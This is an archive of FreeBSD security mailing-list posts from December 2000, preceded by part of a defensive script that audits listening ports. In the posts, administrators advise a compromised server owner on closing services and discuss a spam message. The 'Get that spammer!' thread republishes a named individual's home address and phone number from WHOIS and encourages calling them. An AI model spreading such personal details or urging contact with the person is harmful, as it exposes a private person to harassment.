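        host = $6; sub(/:[^:]*$/, "", host)   # text before the last colon
        if (host ~ /^127\./)          verdict = "LOCAL"
        else if (!(port in expected)) verdict = "UNEXPECTED"
        else if (expected[port] != $2) verdict = "MISMATCH"
        else                          verdict = "OK"
        printf "%s %s %s pid=%s user=%s\n", verdict, port, $2, $3, $1
    }'
}

# count_verdict VERDICT   (audit output on stdin)
count_verdict() {
    awk -v v="$1" '$1 == v { c++ } END { print c + 0 }'
}

# Assumed policy for a DNS/mail/web host administered over ssh.
ALLOW="22:sshd 25:sendmail 53:named 80:httpd 587:sendmail"

sample_sockstat | audit_listeners "$ALLOW"

# Constructed failure case: something other than sendmail holding 587.
printf 'nobody sh 999 3 tcp4 *:587 *:*\n' | audit_listeners "$ALLOW"
```

A matching command name is only a first pass: confirm the executable behind the PID and how it gets started before trusting the listener.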

From owner-freebsd-security Wed Dec 13 8:29:36 2000
From: mikel
To: Robert McCallum
Cc: misc@openbsd.org, freebsd-security@FreeBSD.ORG
Subject: Re: 911 lockdown!
Date: Wed, 13 Dec 2000 11:28:31 -0500

Robert,

First things first: calm down. Now do you have access to your router's config? If so, set up a few access lists to block everything you don't absolutely need. This is not a true fw but it will buy you some time to regroup.

If you want more direct assistance mail me directly and we'll chat...

Robert McCallum wrote:

> My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted'
> the server 'yet'. But I do see that they have obtained access to a user
> account. It appears they cracked a user's account which I found out that one
> of my users did not adhere to our security policy and set a password that
> was not in accordance to our password policy.
>
> I did find the cracker's address, although he did attempt to clean-up after
> himself, he was not very good.
>
> The machines were up approx. 1 month and are not behind a firewall as of
> yet.
> The delay of setting up a firewall ( which there is no excuse ) is
> due to the fact that we are moving to a new office and leasing bandwidth
> from a different service provider. Who is going to assign us a new block
> of IP's. Laziness is the cause of this break-in.
>
> I lack the hardware to setup a firewall/router at this time. The only
> thing I can do is firewall the server itself. I have already wrapped and
> disallowed access to many services from outside our subnet, but this does
> not seem to be sufficient since so ports are still open and can be
> accessed such as, X11 on 6000, SMTP 25, IMAP on 143, etc. I also noticed
> that on port 587 the service named 'submission' is open ... and when I
> telnet to it ... It starts a sendmail shell like port 25. Is this
> normal? I don't remember seeing this before.
>
> In conclusion, I need to setup a firewall on that particular host ASAP. I
> have read a lot of documentation on firewalls and internet security which
> I do understand. However, I am not exp. with IP FILTER or IPFW.
>
> I have one NIC in my box with that address of (example address) 208.202.32.3
> and have 2 other IP's bound to the same interface. (IP Aliasing)
>
> Being that time is of the essence here, I do not have the time to read up
> on firewall rules right now, I would be eternally grateful for some help
> with the rules I need in order to filter the following ports and close all
> others.
>
> Port       State       Service
> 21/tcp     open        ftp
> 22/tcp     open        ssh
> 25/tcp     open        smtp
> 53/tcp     open        domain
> 80/tcp     open        http
> 110/tcp    open        pop-3
> 111/tcp    open        sunrpc
> 143/tcp    open        imap2
> 587/tcp    open        submission
> 3306/tcp   open        mysql
> 6000/tcp   open        X11
>
> ftp and ssh are wrapped (I know, not a good idea to wrap ssh.) In this
> case I had to.
>
> I am sure I can figure out how to setup IPFILTER as long as I have the
> correct rules. However it would be helpful to have a very fast run down
> of the steps I need to take in order to get it running.
>
> thanks a lot for taking the time to read this...
>
> -robert
>
> please CC: me a copy of any replies.

From owner-freebsd-security Wed Dec 13 8:32:53 2000
From: Dag-Erling Smorgrav
To: Robert McCallum
Cc: misc@openbsd.org, freebsd-security@FreeBSD.ORG
Subject: Re: 911 lockdown!
Date: 13 Dec 2000 17:32:35 +0100

Robert McCallum writes:
> [...]

Ideally, you should reinstall the entire system from a trusted source (preferably an original CD-ROM). That said, I'll give you a few hints about your open ports:

> Port       State       Service
> 21/tcp     open        ftp

Only allow anonymous logins, if any (add the -A option to the ftpd line in inetd.conf)

> 22/tcp     open        ssh

Edit /etc/ssh/sshd_config to specify which hosts are allowed to connect.

> 25/tcp     open        smtp

If you don't need it, set sendmail_flags to "-q30m" so it won't listen for incoming connections but still runs the queue (so you can send mail but not receive)

> 53/tcp     open        domain

Is this machine a name server? If it's not, disable named in /etc/rc.conf. If you just want a caching nameserver, edit /etc/namedb/named.conf and set listen-on to 127.0.0.1 - but if at all possible, avoid doing even that.

> 80/tcp     open        http

Is this machine a web server?

> 110/tcp    open        pop-3

Wrap it, and make sure the pop server software is up-to-date, most pop daemons are notoriously insecure.

> 111/tcp    open        sunrpc

You don't need this. Add portmap_enable="NO" to /etc/rc.conf.

> 143/tcp    open        imap2

Same comments as for pop3. If possible, use Cyrus, most other imap servers are notoriously insecure.

> 587/tcp    open        submission

This is probably a back door the intruder left behind. Use sockstat(1) to determine which process owns the socket, and kill it (and make sure it doesn't restart when you reboot)

> 3306/tcp   open        mysql

Does that machine really need to run mysql? If yes, does it really need to accept TCP connections? Refer to the mysql documentation for information on how to prevent it from listening for TCP connections.

> 6000/tcp   open        X11

Why are you running X on a server? If you really must (you don't, but I won't argue the case), edit whatever script you use to start X to add the '-nolisten tcp' option to the server command line.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Wed Dec 13 8:42:56 2000
From: Szilveszter Adam
To: freebsd-security@FreeBSD.ORG
Subject: Re: 911 lockdown!
Date: Wed, 13 Dec 2000 17:42:49 +0100

Hello!

On Wed, Dec 13, 2000 at 05:32:35PM +0100, Dag-Erling Smorgrav wrote:
> > 587/tcp    open        submission
>
> This is probably a back door the intruder left behind. Use sockstat(1)
> to determine which process owns the socket, and kill it (and make sure
> it doesn't restart when you reboot)
>

Uhm, if he is running sendmail (a recent version,) then it may be just that: sendmail now runs on two ports, 25 and 587 unless configured otherwise. OTB it will listen on both ports. Esp since he said that telnetting to this port starts up a sendmail which is expected behaviour.

--
Regards:

Szilveszter ADAM
Szeged University
Szeged Hungary

From owner-freebsd-security Wed Dec 13 8:43:19 2000
From: Rob Simmons
To: Robert McCallum
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: 911 lockdown!
Date: Wed, 13 Dec 2000 11:42:55 -0500 (EST)

I have a couple of suggestions for securing the server in the future. You should run the SSL version of pop and imap, or use stunnel to make an SSL wrapper for these services. In an optimal situation, you should only allow access to the SSL service, or at least only allow users that are behind the firewall to access the non SSL services.

I would also disable ftp. You can run sftp through OpenSSH now, just look at /etc/ssh/sshd_config the last couple of lines should be uncommented out for sftp. Another option to that, if you are against running SSL version 2, is to install the package lrzsz and use that over an ssh session to transfer files. Z-modem is supported by most windows ssh clients, and in unix you just need the lrzsz on both ends of the connection.

As for the MSA (Mail Submission Agent) on port 587, you can read about it in http://www.faqs.org/rfcs/rfc2476.html.
It is unfortunately not implemented in many email clients at this time, and actually, if you find a good client that supports it let me know.

Also, if your box has been broken into, it's good policy to reinstall it from the ground up, since you never will know how deep the person got into your system, or whether the "sloppiness" is just a cover to make the admin of the machine believe that they have found all the problems.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Wed, 13 Dec 2000, Robert McCallum wrote:

>
> My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted'
> the server 'yet'. But I do see that they have obtained access to a user
> account. It appears they cracked a user's account which I found out that one
> of my users did not adhere to our security policy and set a password that
> was not in accordance to our password policy.
>
> I did find the cracker's address, although he did attempt to clean-up after
> himself, he was not very good.
>
> The machines were up approx. 1 month and are not behind a firewall as of
> yet. The delay of setting up a firewall ( which there is no excuse ) is
> due to the fact that we are moving to a new office and leasing bandwidth
> from a different service provider. Who is going to assign us a new block
> of IP's. Laziness is the cause of this break-in.
>
> I lack the hardware to setup a firewall/router at this time. The only
> thing I can do is firewall the server itself. I have already wrapped and
> disallowed access to many services from outside our subnet, but this does
> not seem to be sufficient since so ports are still open and can be
> accessed such as, X11 on 6000, SMTP 25, IMAP on 143, etc. I also noticed
> that on port 587 the service named 'submission' is open ... and when I
> telnet to it ... It starts a sendmail shell like port 25. Is this
> normal? I don't remember seeing this before.
>
> In conclusion, I need to setup a firewall on that particular host ASAP.
> I have read a lot of documentation on firewalls and internet security which
> I do understand. However, I am not exp. with IP FILTER or IPFW.
>
> I have one NIC in my box with that address of (example address) 208.202.32.3
> and have 2 other IP's bound to the same interface. (IP Aliasing)
>
> Being that time is of the essence here, I do not have the time to read up
> on firewall rules right now, I would be eternally grateful for some help
> with the rules I need in order to filter the following ports and close all
> others.
>
> Port       State       Service
> 21/tcp     open        ftp
> 22/tcp     open        ssh
> 25/tcp     open        smtp
> 53/tcp     open        domain
> 80/tcp     open        http
> 110/tcp    open        pop-3
> 111/tcp    open        sunrpc
> 143/tcp    open        imap2
> 587/tcp    open        submission
> 3306/tcp   open        mysql
> 6000/tcp   open        X11
>
>
> ftp and ssh are wrapped (I know, not a good idea to wrap ssh.) In this
> case I had to.
>
> I am sure I can figure out how to setup IPFILTER as long as I have the
> correct rules. However it would be helpful to have a very fast run down
> of the steps I need to take in order to get it running.
>
> thanks a lot for taking the time to read this...
>
> -robert
>
> please CC: me a copy of any replies.

From owner-freebsd-security Wed Dec 13 8:43:36 2000
From: Richard Ward
To: mikel, Robert McCallum
Subject: Re: 911 lockdown!
Date: Wed, 13 Dec 2000 11:42:47 -0500

Agreed, the first step is to calm down. Although most wouldn't believe this, but system security is compromised every single day. And for every bug-fix that is released for a program, three new bugs have already surfaced. The most important thing you can do, and it will save you a great deal of time; back up frequently. Once you "know" for sure that the system is clean, and free of any trouble; back it up!
This is a lesson I have learned the hard way, in the many years I've worked with Web Hosting and Shell Provider companies. The best way to keep track of bugs, is obviously via mailing lists such as this one. No system is totally secure, unless it's un-plugged. I wish you luck in getting back on your feet, and finding the kiddie(s) who have been poking around your system.

--
Richard Ward, CEO
richard@neonsky.net
Neonsky Internet Services
877 249 6707 - US/Canada

----- Original Message -----
From: mikel
To: Robert McCallum
Sent: Wednesday, December 13, 2000 11:28 AM
Subject: Re: 911 lockdown!

> Robert,
>
> First things first: calm down. Now do you have access to your router's
> config? If so, set up a few access lists to block everything you don't absolutely
> need. This is not a true fw but it will buy you some time to regroup.
>
> If you want more direct assistance mail me directly and we'll chat...
>
> Robert McCallum wrote:
>
> > My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted'
> > the server 'yet'. But I do see that they have obtained access to a user
> > account. It appears they cracked a user's account which I found out that one
> > of my users did not adhere to our security policy and set a password that
> > was not in accordance to our password policy.
> >
> > I did find the cracker's address, although he did attempt to clean-up after
> > himself, he was not very good.
> >
> > The machines were up approx. 1 month and are not behind a firewall as of
> > yet. The delay of setting up a firewall ( which there is no excuse ) is
> > due to the fact that we are moving to a new office and leasing bandwidth
> > from a different service provider. Who is going to assign us a new block
> > of IP's. Laziness is the cause of this break-in.
> >
> > I lack the hardware to setup a firewall/router at this time. The only
> > thing I can do is firewall the server itself.
> > I have already wrapped and
> > disallowed access to many services from outside our subnet, but this does
> > not seem to be sufficient since so ports are still open and can be
> > accessed such as, X11 on 6000, SMTP 25, IMAP on 143, etc. I also noticed
> > that on port 587 the service named 'submission' is open ... and when I
> > telnet to it ... It starts a sendmail shell like port 25. Is this
> > normal? I don't remember seeing this before.
> >
> > In conclusion, I need to setup a firewall on that particular host ASAP. I
> > have read a lot of documentation on firewalls and internet security which
> > I do understand. However, I am not exp. with IP FILTER or IPFW.
> >
> > I have one NIC in my box with that address of (example address) 208.202.32.3
> > and have 2 other IP's bound to the same interface. (IP Aliasing)
> >
> > Being that time is of the essence here, I do not have the time to read up
> > on firewall rules right now, I would be eternally grateful for some help
> > with the rules I need in order to filter the following ports and close all
> > others.
> >
> > Port       State       Service
> > 21/tcp     open        ftp
> > 22/tcp     open        ssh
> > 25/tcp     open        smtp
> > 53/tcp     open        domain
> > 80/tcp     open        http
> > 110/tcp    open        pop-3
> > 111/tcp    open        sunrpc
> > 143/tcp    open        imap2
> > 587/tcp    open        submission
> > 3306/tcp   open        mysql
> > 6000/tcp   open        X11
> >
> > ftp and ssh are wrapped (I know, not a good idea to wrap ssh.) In this
> > case I had to.
> >
> > I am sure I can figure out how to setup IPFILTER as long as I have the
> > correct rules. However it would be helpful to have a very fast run down
> > of the steps I need to take in order to get it running.
> >
> > thanks a lot for taking the time to read this...
> >
> > -robert
> >
> > please CC: me a copy of any replies.

From owner-freebsd-security Wed Dec 13 9: 1:34 2000
From: Rob Simmons
To: Szilveszter Adam
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: 911 lockdown!
Date: Wed, 13 Dec 2000 12:01:05 -0500 (EST)

Yes. If you want to disable it, add:

FEATURE(`no_default_msa')

to your mc file and rebuild the cf.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Wed, 13 Dec 2000, Szilveszter Adam wrote:

> Hello!
>
> On Wed, Dec 13, 2000 at 05:32:35PM +0100, Dag-Erling Smorgrav wrote:
> > > 587/tcp    open        submission
> >
> > This is probably a back door the intruder left behind. Use sockstat(1)
> > to determine which process owns the socket, and kill it (and make sure
> > it doesn't restart when you reboot)
> >
>
> Uhm, if he is running sendmail (a recent version,) then it may be just
> that: sendmail now runs on two ports, 25 and 587 unless configured
> otherwise. OTB it will listen on both ports.
> Esp since he said that
> telnetting to this port starts up a sendmail which is expected behaviour.
>
> --
> Regards:
>
> Szilveszter ADAM
> Szeged University
> Szeged Hungary

From owner-freebsd-security Wed Dec 13 9:10:24 2000
From: Brett Glass
To: Robert McCallum, misc@openbsd.org
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: 911 lockdown!
Date: Wed, 13 Dec 2000 10:09:43 -0700

Pardon me if I'm missing something here, but how would a firewall prevent someone from cracking a guessable password on a legitimate user account?

--Brett Glass

At 09:18 AM 12/13/2000, Robert McCallum wrote:

>My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted'
>the server 'yet'. But I do see that they have obtained access to a user
>account. It appears they cracked a user's account which I found out that one
>of my users did not adhere to our security policy and set a password that
>was not in accordance to our password policy.
>....
>In conclusion, I need to setup a firewall on that particular host ASAP.

"Were parties here divided merely by greediness for office...,
to take a part with either would be unworthy of a reasonable
or moral man." --Thomas Jefferson

From owner-freebsd-security Wed Dec 13 9:44:55 2000
From: Kenneth Ingham
To: Robert McCallum
Cc: misc@openbsd.org, freebsd-security@freebsd.org
Subject: Re: 911 lockdown!
Date: Wed, 13 Dec 2000 10:43:23 -0700

I would recommend running a password guesser (Crack, John the Ripper, etc) on the rest of your accounts. This might give you a heads up on other accounts to watch/disable.

Kenneth

From owner-freebsd-security Wed Dec 13 10:25:33 2000
From: Terry Zink
To: freebsd-security@FreeBSD.ORG
Subject: Re: 911 lockdown!
Date: Wed, 13 Dec 2000 13:26:27 -0500

Rather easily. If the outsider cannot get into the proper services (ssh most likely) to log in, then he can't crack. Most crackers use telnet, or pop. But if he finds the pop pass he can't do much if telnet and ssh are closed to all but the internal network.

My biggest problem with firewalls is you need to throw them behind a nat generally speaking to use them (If anyone can gimme a simple way to set the gateway to a bsd box and have the bsd box allow full access to the ip but blocking out ips from the source from getting to it .... .. lemme know)

I know that last sentence made no sense, and I'm sorry. Long day, not a priority.

Biggest problem I have with firewalling the servers at my job is... we're an ISP... Adding a firewall presents yet ANOTHER single point of failure..

Anyways that was my rant for the day, hope you all enjoyed :)

At 10:09 AM 12/13/00 -0700, you wrote:
>Pardon me if I'm missing something here, but how would a firewall
>prevent someone from cracking a guessable password on a legitimate
>user account?
>
>--Brett Glass
>
>At 09:18 AM 12/13/2000, Robert McCallum wrote:
>
> >My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted'
> >the server 'yet'. But I do see that they have obtained access to a user
> >account. It appears they cracked a user's account which I found out that one
> >of my users did not adhere to our security policy and set a password that
> >was not in accordance to our password policy.
> >....
>
> >In conclusion, I need to setup a firewall on that particular host ASAP.
>
>"Were parties here divided merely by greediness for office...,
>to take a part with either would be unworthy of a reasonable
>or moral man." --Thomas Jefferson

Regards,
Terry Zink
Metrocon Communications
Phone: (212) 661-6800 ext. 1554
Fax: (212) 661-1229

From owner-freebsd-security Wed Dec 13 11:24: 2 2000
From: Brett Glass
To: Terry Zink, freebsd-security@FreeBSD.ORG
Subject: Re: 911 lockdown!
Date: Wed, 13 Dec 2000 12:23:25 -0700

At 11:26 AM 12/13/2000, Terry Zink wrote:

>Rather easily. If the outsider cannot get into the proper services (ssh
>most likely) to log in, then he can't crack.

Ah, but then neither can legitimate users. This fellow was talking about leaving quite a few services available through the firewall.

--Brett

"Were parties here divided merely by greediness for office...,
to take a part with either would be unworthy of a reasonable
or moral man."
--Thomas Jefferson
*************************************************************************= * Framing equipment. *************************************************************************= * http://www.larsonjuhl.com http://www.knoell.com http://www.clearmountcorp.com=20 http://www.speed-mat.com *************************************************************************= * Moulding, mats & supplies *************************************************************************= * http://www.pictureframes.com http://www.imageperfectglass.com http://www.crescentcardboard.com http://www.fotiou.com http://www.mtsframes.com=20 http://www.gulloinc.com=20 http://www.oxfordpictureframe.com http://www.rustic-creations.com *************************************************************************= * Art links to resources. *************************************************************************= * www.chalkychalk.com http://www.artaffairs.com http://www.dragonflyproductionsinc.com http://www.hop.ca http://www. bevellededge. com http://www.torontoimageworks.com *************************************************************************= * *************************************************************************= * The Riddle of the day=20 What am I? 1.. Everyone has me. 2.. You will all lose me. 3.. Some see me as substantial & other see me meaningless. 4.. I have never been understood and may never be understood=20 5.. Without me is to be without you and without me is to be without. 6.. I will be the one reason that grants you the possibility to salve = this riddle. 7.. Without me this riddle could never be written. To find out the answer to what am I? Look to:=20 www.chalkychalk.com *************************************************************************= * TO UNSUBSCRIBE FROM ART -NEWS, SIMPLY e-mail:=20 chalkychalk@bizland.com AND WRITE - STOP-in the subject line. This is not Spam. 
If you are not a part of the picture framing or art = industry this was not intended for you and we have no us for your = interest what so ever. ------=_NextPart_000_0012_01C06519.0DCCFEA0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

------=_NextPart_000_0012_01C06519.0DCCFEA0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13: 6:40 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:06:37 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 9484837B699 for ; Wed, 13 Dec 2000 13:06:36 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA15551 for ; Wed, 13 Dec 2000 14:06:30 -0700 (MST) Message-Id: <4.3.2.7.2.20001213135715.00b82760@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 13 Dec 2000 14:05:26 -0700 To: security@freebsd.org From: Brett Glass Subject: Get that spammer! (Was: professional art community) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Several copies of this same spam just tried to get through our server. The first set off an alarm and we're blocking. If you want to complain, the relevant addresses are: abuse@rogerswave.ca (The spammer's DSL provider) abuse@bizland-inc.com (The spammer's e-mail provider and Web host) securityalert@bizland-inc.com (Another abuse address at the hosting firm) Bizland-inc.com says that they WILL act if they see multiple complaints about spamming. Also, the WHOIS information for the domain "chalkychalk.com" includes the following administrative contact: Administrative Contact: Chalky Chalk Chris Newbold 44 buchanan cres brantford, ON N3P2A5 CA Phone: (519) 756 6102 Email: chalkychalk@home.com Might be worth a call. 
--Brett Glass >Delivered-To: freebsd-security@freebsd.org >: > > :: >: > > >:: >: >Reply-To: "Jim Gunn" >From: "Jim Gunn" >To: >Subject: professional art community >Date: Wed, 13 Dec 2000 15:26:06 -0600 >: >X-Security: Warning! Do not open files attached to e-mail if you do not > have an up-to-date virus protection program or did not expect to > receive them. Even if the message is from someone you know, an > attachment can contain a virus sent without his or her knowledge. >: > >: >: >X-Mailer: Microsoft Outlook Express 5.50.4133.2400 >: >Sender: owner-freebsd-security@FreeBSD.ORG >X-Loop: FreeBSD.org >: >: "Were parties here divided merely by greediness for office..., to take a part with either would be unworthy of a reasonable or moral man." --Thomas Jefferson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:10:13 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:10:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from stage1.thirdage.com (stage1.thirdage.com [4.18.197.236]) by hub.freebsd.org (Postfix) with ESMTP id 39CD837B698 for ; Wed, 13 Dec 2000 13:10:08 -0800 (PST) Received: (from jal@localhost) by stage1.thirdage.com (8.9.1/8.9.1) id NAA18034; Wed, 13 Dec 2000 13:13:05 -0800 (PST) Date: Wed, 13 Dec 2000 13:13:05 -0800 From: "Jamie A. Lawrence" To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Get that spammer! 
(Was: professional art community) Message-ID: <20001213131305.B17715@stage1.thirdage.com> References: <4.3.2.7.2.20001213135715.00b82760@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <4.3.2.7.2.20001213135715.00b82760@localhost>; from Brett Glass on Wed, Dec 13, 2000 at 02:05:26PM -0700 Sender: jal@stage1.thirdage.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Dec 13, 2000 at 02:05:26PM -0700, Brett Glass wrote: > Administrative Contact: > Chalky Chalk > Chris Newbold > 44 buchanan cres > brantford, ON N3P2A5 > CA > Phone: (519) 756 6102 > Email: chalkychalk@home.com > > Might be worth a call. I thought I'd waste a dime on it. "This international call requires special billing approval." Thus spake ATT. -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:15:43 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:15:39 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 83B5137B699 for ; Wed, 13 Dec 2000 13:15:38 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA15675; Wed, 13 Dec 2000 14:15:31 -0700 (MST) Message-Id: <4.3.2.7.2.20001213141435.00e00100@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 13 Dec 2000 14:15:28 -0700 To: "Jamie A. Lawrence" From: Brett Glass Subject: Re: Get that spammer! 
(Was: professional art community) Cc: security@FreeBSD.ORG In-Reply-To: <20001213131305.B17715@stage1.thirdage.com> References: <4.3.2.7.2.20001213135715.00b82760@localhost> <4.3.2.7.2.20001213135715.00b82760@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:13 PM 12/13/2000, Jamie A. Lawrence wrote: >"This international call requires special billing approval." > >Thus spake ATT. I wonder if this is something unique about your phone service. I got through.... Got an answering machine, though. --Brett "Were parties here divided merely by greediness for office..., to take a part with either would be unworthy of a reasonable or moral man." --Thomas Jefferson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:24: 1 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:23:58 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from stage1.thirdage.com (stage1.thirdage.com [4.18.197.236]) by hub.freebsd.org (Postfix) with ESMTP id 4660537B400 for ; Wed, 13 Dec 2000 13:23:58 -0800 (PST) Received: (from jal@localhost) by stage1.thirdage.com (8.9.1/8.9.1) id NAA18495; Wed, 13 Dec 2000 13:26:56 -0800 (PST) Date: Wed, 13 Dec 2000 13:26:55 -0800 From: "Jamie A. Lawrence" To: Brett Glass Cc: "Jamie A. Lawrence" , security@FreeBSD.ORG Subject: Re: Get that spammer! 
(Was: professional art community) Message-ID: <20001213132655.A18438@stage1.thirdage.com> References: <4.3.2.7.2.20001213135715.00b82760@localhost> <4.3.2.7.2.20001213135715.00b82760@localhost> <20001213131305.B17715@stage1.thirdage.com> <4.3.2.7.2.20001213141435.00e00100@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <4.3.2.7.2.20001213141435.00e00100@localhost>; from Brett Glass on Wed, Dec 13, 2000 at 02:15:28PM -0700 Sender: jal@stage1.thirdage.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Dec 13, 2000 at 02:15:28PM -0700, Brett Glass wrote: > > I wonder if this is something unique about your phone service. > I got through.... Got an answering machine, though. > > --Brett I'm not inclined to spend a lot of time on it, but this came from a calling card attached to ATT. (Yes, way expensive, but keeping billing separate is cheaper than sorting it out.) -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:25:46 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:25:41 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 3B95F37B699 for ; Wed, 13 Dec 2000 13:25:41 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id eBDLP5s30863; Wed, 13 Dec 2000 16:25:06 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Wed, 13 Dec 2000 16:25:05 -0500 (EST) From: Rob Simmons To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Get that spammer! 
(Was: professional art community) In-Reply-To: <4.3.2.7.2.20001213135715.00b82760@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Already sent to spamcop :) Julian Haight runs quite a good service over at spamcop, it parses the spam and does everything that you described below, and creates nice complaints and sends them to the appropriate parties involved. The origin of this particular piece of spam is owned by @home.com so mainly send complaints to abuse@home.com Robert Simmons Systems Administrator http://www.wlcg.com/ On Wed, 13 Dec 2000, Brett Glass wrote: > Several copies of this same spam just tried to get through our > server. The first set off an alarm and we're blocking. If you want to > complain, the relevant addresses are: > > abuse@rogerswave.ca (The spammer's DSL provider) > abuse@bizland-inc.com (The spammer's e-mail provider and Web host) > securityalert@bizland-inc.com (Another abuse address at the hosting firm) > > Bizland-inc.com says that they WILL act if they see multiple > complaints about spamming. > > Also, the WHOIS information for the domain "chalkychalk.com" includes > the following administrative contact: > > Administrative Contact: > Chalky Chalk > Chris Newbold > 44 buchanan cres > brantford, ON N3P2A5 > CA > Phone: (519) 756 6102 > Email: chalkychalk@home.com > > Might be worth a call. > > --Brett Glass > > > >Delivered-To: freebsd-security@freebsd.org > >: > > > > :: > >: > > > > > >:: > >: > >Reply-To: "Jim Gunn" > >From: "Jim Gunn" > >To: > >Subject: professional art community > >Date: Wed, 13 Dec 2000 15:26:06 -0600 > >: > >X-Security: Warning! Do not open files attached to e-mail if you do not > > have an up-to-date virus protection program or did not expect to > > receive them. Even if the message is from someone you know, an > > attachment can contain a virus sent without his or her knowledge. 
> >: > > > >: > >: > >X-Mailer: Microsoft Outlook Express 5.50.4133.2400 > >: > >Sender: owner-freebsd-security@FreeBSD.ORG > >X-Loop: FreeBSD.org > >: > >: > > > "Were parties here divided merely by greediness for office..., > to take a part with either would be unworthy of a reasonable > or moral man." --Thomas Jefferson > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:33:21 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:33:18 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from roble.com (mx0.roble.com [206.40.34.14]) by hub.freebsd.org (Postfix) with ESMTP id 9660937B402 for ; Wed, 13 Dec 2000 13:33:18 -0800 (PST) Received: from localhost (marquis@localhost) by roble.com with ESMTP id eBDLXIw71392 for ; Wed, 13 Dec 2000 13:33:18 -0800 (PST) Date: Wed, 13 Dec 2000 13:33:18 -0800 (PST) From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: Get that spammer! (bizland-inc.com) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Brett Glass wrote: > server. The first set off an alarm and we're blocking. If you want to > complain, the relevant addresses are: > > abuse@rogerswave.ca (The spammer's DSL provider) > abuse@bizland-inc.com (The spammer's e-mail provider and Web host) > securityalert@bizland-inc.com (Another abuse address at the hosting firm) Actually bizland-inc.com is the spammer, despite their misleading web page. Chalkychalk.com et al are Bizland customers. Bizland-inc.com, aka bizland.com, aka prontomail.com, aka click2site.com has a long history of spam on behalf of various customers. 
